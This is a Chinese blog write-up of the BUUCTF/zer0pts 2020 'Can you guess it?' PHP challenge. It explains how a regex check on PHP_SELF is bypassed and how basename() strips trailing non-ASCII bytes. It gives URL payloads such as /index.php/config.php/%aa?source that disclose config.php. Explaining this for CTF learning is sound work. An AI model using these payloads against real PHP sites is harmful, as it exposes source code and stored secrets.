[Zer0pts2020]basename函数漏洞

最新推荐文章于 2023-12-29 10:01:14 发布
最新推荐文章于 2023-12-29 10:01:14 发布
阅读量1.9k 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: php 后端 函数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/121742710
版权

打开靶场后可以直接点击Source进入源码,题目很明确告诉如果提交的参数一致则得到flag

源码:

<?php
include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
  exit("I don't know what you are thinking, but I won't let you read it :)");
}

if (isset($_GET['source'])) {
  highlight_file(basename($_SERVER['PHP_SELF']));
  exit();
}

$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
  $guess = (string) $_POST['guess'];
  if (hash_equals($secret, $guess)) {
    $message = 'Congratulations! The flag is: ' . FLAG;
  } else {
    $message = 'Wrong.';
  }
}
?>

这里有两种解题方式,第一种绕过正则表达式访问开头源码提示flag的config.php,第二种比较两个提交的参数是否相等,则给出flag,random_bytes函数生成适合于加密使用的任意长度的加密随机字节字符串,随后通过bin2hex转换为十六进制值,代码如下:

<?php
echo (random_bytes(64)) ."<br/>";//如果想复现,请将PHP version 更改为>=7
echo "<hr>";
echo bin2hex(random_bytes(64)) ."<br/>";
echo "<hr>";
echo (random_bytes(64)) ."<br/>";
echo "<hr>";
echo bin2hex(random_bytes(64)) ."<br/>";
?>

问题在于每次生成的字符串长度不一致也是随机的,由于之前做了些伪随机数的相关题目,所以一开始把目标放在这里,后来我看了大部分wp,都是利用basename函数绕过第一关,自己也没想出如何过第二关

首先是需要绕过这个正则表达式:

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) 

表示不能以config.php为结尾,所以需要在config.php后面再加一个文件名,如:

  • /config.php/index.php

  • /config.php/flag.php

  • ... ...

接下来获取flag的关键

highlight_file(basename($_SERVER['PHP_SELF']));

问题出在basename函数上,basename()函数会返回路径中的文件名部分,但是它会去掉文件名开头的非ASCII值!

举个例子:

<?php
    $url1 = "path/index.php"; // 返回index.php
    $url2 = "path/index.php".urldecode('%D1%A7%CF'); // 返回index.php和乱码
    $url3 = urldecode('%D1%A7%CF%B0index.php+ '); // 返回flag.php,前面的非acsii被删除
    $url4 = urldecode('%74%65%73%74%5findex.php%D1%A7%CF%B0 '); // 返回flag.php和 后面的非ascii
echo basename($url1) ."<br/>";
echo basename($url2) ."<br/>";
echo basename($url3) ."<br/>";
echo basename($url4) ."<br/>";
?>

执行结果:

index.php
index.php学�
index.php
test_index.php学习 

构造payload的时候,只需保证config.php后面是非ascii值即可

  • /index.php/config.php/%aa?source

  • /index.php/config.php/%bb?source

  • /index.php/config.php/%cc?source  

bbb07
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
zer0pts-CTF-2021:zer0pts CTF 2021
05-06
zer0pts CTF 2021 是一个网络安全竞赛,主要针对网络安全爱好者和专业人士,旨在提升参赛者在信息安全领域的技能和知识。此类竞赛通常包括多种挑战,如逆向工程、密码学、网络取证、Web安全等。在这个特定的案例中,...
basename函数漏洞之[Zer0pts2020]Can you guess it?
qq_58970968的博客
08-26 373
这里正则的绕过,不能让config.php结尾,在它后面加点东西就可以了,比如/a 等等,但是为了使后面的basename得到的结果为config.php,这后面加的东西不能乱加,那么就加非ASCII码的字符就行啦,给个脚本吧。basename 函数,获取路径中的文件名;比如:test/inde.php/s 就会返回index,php。但是漏洞就是,它会去掉文件名开头的或者结尾的非ASCII值!...
php basename() 绕过,【转】PHP里的basename函数不支持中文名的解决
weixin_42314192的博客
03-29 918
今天用到basename 函数获取文件名称时,发现如果是中文的文件名返回只有后缀的空文件名(如:.pdf)string basename ( string path [, string suffix] )说明给出一个包含有指向一个文件的全路径的字符串,本函数返回基本的文件名。如果文件名是以 suffix 结束的,那这一部分也会被去掉。方法一:按照网站上找到说法是此函数依赖于区域设置,如果是多字节名...
[Zer0pts2020]Can you guess it?(basename漏洞
qq_54929891的博客
03-22 3037
点击source <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)"); } if (isset($_GET['source'])) { highl
basename函数在php5.0.1和php5.0.5中出现bug:#30105
讨厌什么,变成什么.
04-04 1680
(os: redhat linux 9.0, php: 5.0.5)原来的程序一直运行良好,但最近出现数据错误。跟踪调试后发现是basename出现了问题,它在处理中文文件名时不正常,如:basename("/app/默认配置.cfg"),返回值总为""。google一下后发现该bug已被上报,编号为30105,有人在各windows平台进行测试,在win2k中文版中出现该bug(好像与平台的UN
[鹤城杯 2021]EasyP
最新发布
m0_73612768的博客
12-29 1325
`$_SERVER['PHP_SELF']`;$_SERVER['REQUEST_URI'];basename() 函数绕过
CTF_2021_zer0pts
03-08
质询目录结构 / ├── category (The name doesn't matter) │ ├── challenge (The name doesn't matter) │ │ ├── challenge (Place the files required to build the task, which are not distributed ...
zer0dump:滥用CVE-2020-1472(Zerologon)接管域,然后修复本地存储的计算机帐户密码
03-20
本文将深入探讨zer0dump,这是一个利用CVE-2020-1472(Zerologon)漏洞的Proof-of-Concept(PoC)攻击工具,该漏洞允许攻击者完全控制未修补的Windows域控制器。我们将讨论Zerologon漏洞的原理、zer0dump的工作方式...
zer0m0n:用于布谷鸟沙箱的 zer0m0n 驱动程序
06-05
zer0m0n v0.8 zer0m0n 是 Cuckoo Sandbox 的驱动程序,它将在恶意软件执行期间进行内核分析。 恶意软件作者有很多方法可以绕过 Cuckoo 检测,他可以检测钩子,硬编码 Nt* 函数来避免钩子,检测虚拟机......这个驱动...
host0:Zer0net的托管服务
04-28
Peer0整合 在设置本地主机Web代理 回应来自同伴的基本要求 getFile PEX-对等交换 将完整的Zite下载并验证到本地存储 向跟踪器宣布资源可用性 零网络 HTTP UDP协议 使用Electron UI构建基本的管理仪表板 ...
DVWA之PHP文件上传漏洞(File Upload)
Mi1k7ea
01-22 1万+
文件上传漏洞是指由于服务器对于用户上传部分的控制不严格导致攻击者可以上传一个恶意的可执行的文件到服务器。简单点说,就是用户直接或者通过各种绕过方式将webshell上传到服务器中进而执行利用。 首先保存一句话木马为1.php文件: 另外对于上传的文件,可在DVWA的服务器中(本人用的是Metasploitable虚拟机)以下路径找到: /var/www/dvwa/hackab
java 文件上传漏洞_文件上传漏洞(绕过姿势)
weixin_33315077的博客
02-16 4499
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人经验总结,欢迎补充纠错~~)文件上传校验姿...
$_SERVER['PHP_SELF']漏洞知多少
精彩人生
06-18 3680
$_SERVER['PHP_SELF']是PHP语言中的“服务器端系统变量”,它的值是“当前php文件相对于网站根目录的位置地址”。举例说明,如果在http://www.shuihan.com/output/html/data.php文件中使用$_SERVER['PHP_SELF'],代码如下: 1echo $_SERVER['PHP_SELF']; 则在浏览器中打开该页输出为: /ou
典型漏洞归纳之上传漏洞
weixin_30911451的博客
02-21 1765
0x01 概要说明 文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。 from : http:/...
Easyp 题后总结
m0_62422842的博客
04-18 470
做这题时遇见了新的函数和新的绕过,再次总结一下。 看一下题内代码 <?php include 'utils.php'; if (isset($_POST['guess'])) { $guess = (string) $_POST['guess']; if ($guess === $secret) { $message = 'Congratulations! The flag is: ' . $flag; } else { $message
basename 命令 详解
静。。。。。。。。。
06-25 4145
首先使用 --help 参数查看一下。basename命令参数很少,很容易掌握。   $ basename --help   用法示例:  $ basename /usr/bin/sort       输出"sort"。  $ basename ./include/stdio.h .h  输出"stdio"。    为basename
解析漏洞整理
fendo
02-28 6332
1.什么是解析漏洞 以其他格式执行出脚本格式的效果。 2.解析漏洞产生的条件 1.命名规则 2.搭建平台 3.常见的解析漏洞 (一)IIS5.x-6.x解析漏洞 使用iis5.x-6.x版本的服务器,大多为windows server 2003,网站比较古老,开发语句一般为asp;该解析漏洞也只能解析asp文件,而不能解析aspx文件。
basename
weixin_33895475的博客
08-03 281
功能说明:basename命令用于显示去除路径和文件后缀部分的文件名或目录名。 语法格式: basename [<文件或目录>] [后缀] 注意basename命令及后面的选项和文件,每个元素直接都至少要有一个空格。后缀是可选参数,指定要去除的文件后缀字符串。 生成测试数据 [root@devora2 tmp]# mkdir /tmp/dir1 [root@de...
中间件常见安全漏洞(转载)
热门推荐
m0_46304840的博客
02-27 2万+
第一章:IIS IIS 6 解析漏洞 IIS 7 解析漏洞 PUT任意文件写入 IIS短文件漏洞 HTTP.SYS远程代码执行 (MS15-034) RCE-CVE-2017-7269 第二章:Apache 未知扩展名解析漏洞 AddHandler导致的解析...
ZeroDivisionError: division by zer
05-19
这个错误通常是因为代码中尝试将一个数除以0导致的。例如: ```python x = 10 y = 0 z = x/y # 会抛出 ZeroDivisionError ``` 解决这个错误的方法是确保除数不为0,或者在代码中使用异常处理来处理这种情况。例如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值